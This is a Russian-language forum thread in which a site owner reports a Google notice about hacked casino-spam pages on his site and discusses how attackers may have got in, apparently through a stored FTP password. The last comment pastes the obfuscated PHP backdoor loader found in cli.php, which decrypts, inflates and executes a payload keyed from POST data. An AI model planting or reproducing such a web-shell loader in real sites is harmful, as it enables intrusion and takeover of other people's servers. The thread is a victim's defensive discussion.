письмо от Google - обнаружен взломанный контент

Главные вкладки

Аватар пользователя vekov.vlad vekov.vlad 2 марта 2016 в 10:00

Проснувшись рано по утру, получил письмо:
На сайте http://***.ru/ обнаружен взломанный контент

Веб-мастеру сайта http://***.ru/

Мы обнаружили, что Ваш сайт был взломан и на нем разместили вредоносный контент. Посетители перенаправляются на страницы с нерелевантным или опасным содержанием, что приводит к ухудшению результатов поиска. В связи с этим были вручную приняты определенные меры. Пользователи видят предупреждение о наличии взломанного контента на сайте. Чтобы убрать это предупреждение, удалите взломанный контент и запросите повторную проверку. После подтверждения безопасности Вашего сайта меры будут отменены.

Ниже перечислены URL некоторых взломанных страниц. Они помогут Вам определить причину проблемы. Это неполный список.

http://***.ru/?page=Igrat-onlajn-kazino-slotomaniya

http://***.ru/?page=Igrovie-avtomati-koktejl

http://***.ru/?page=Internet-kazino-goldfishka

Так, что же я обнаружил у себя зайдя по FTP?!

Были найдены и заблокированы следующие скрипты
./www/***.ru/cli.php
./public_html/cli.php

Остались вопросы:
1. Как они туда попали?
2. Как обезопасить себя от подобного?

Комментарии

Аватар пользователя vekov.vlad vekov.vlad 2 марта 2016 в 12:50

В логах админки друпала ничего необычного не нашёл, в логах FTP - поддержка хостинга тоже говорит, что ничего нет. У меня появилось предположение, что причина в хранении пароля от достопа к FTP в файле ftp.ini тотал коммандера. Сейчас удалил и поменял.

Аватар пользователя VasyOK VasyOK 2 марта 2016 в 14:24

Впринципе возможно но не аксиома, сохнраите в тотал коммандере пароль от сайта-пустышки на левом хостинге (пароли естественно никому не давать), и если новый сайт заразится - это прояснит ситуацию

Аватар пользователя vekov.vlad vekov.vlad 2 марта 2016 в 14:35

Не получиться у меня провести этот эксперимент полноценно - работаю с трех различных компьютеров, не ко всем есть одновременный доступ. Вот кусок кода файла cli.php<?php;$MTQMzQNDQxOWM=$MTQMzQNDQxOWE(UEFTFFM);if($MTQMzQNDQxOWM!==NULL){$MTQMzQNDQxOWY=urldecode('%73%75%62%73%74%72');$MTQMzQNDQxOWM=md5($MTQMzQNDQxOWM).$MTQMzQNDQxOWY(md5(strrev($MTQMzQNDQxOWM)),0,strlen($MTQMzQNDQxOWM));for($MTQMzQNDQxOWQ=0;$MTQMzQNDQxOWQ<8583;$MTQMzQNDQxOWQ++){$MTQMzQNDQxOWI[$MTQMzQNDQxOWQ]=chr(( ord($MTQMzQNDQxOWI[$MTQMzQNDQxOWQ])-ord($MTQMzQNDQxOWM[$MTQMzQNDQxOWQ]))%256);$MTQMzQNDQxOWM.=$MTQMzQNDQxOWI[$MTQMzQNDQxOWQ];}if($MTQMzQNDQxOWI=@gzinflate($MTQMzQNDQxOWI)){if(isset($_POST['MTQMzQNDQxOWU']))@setcookie('MTQMzQNDQxOWU', $_POST['MTQMzQNDQxOWU']);$MTQMzQNDQxOWQ=create_function('',$MTQMzQNDQxOWI);unset($MTQMzQNDQxOWI,$MTQMzQNDQxOWM);$MTQMzQNDQxOWQ();}}?>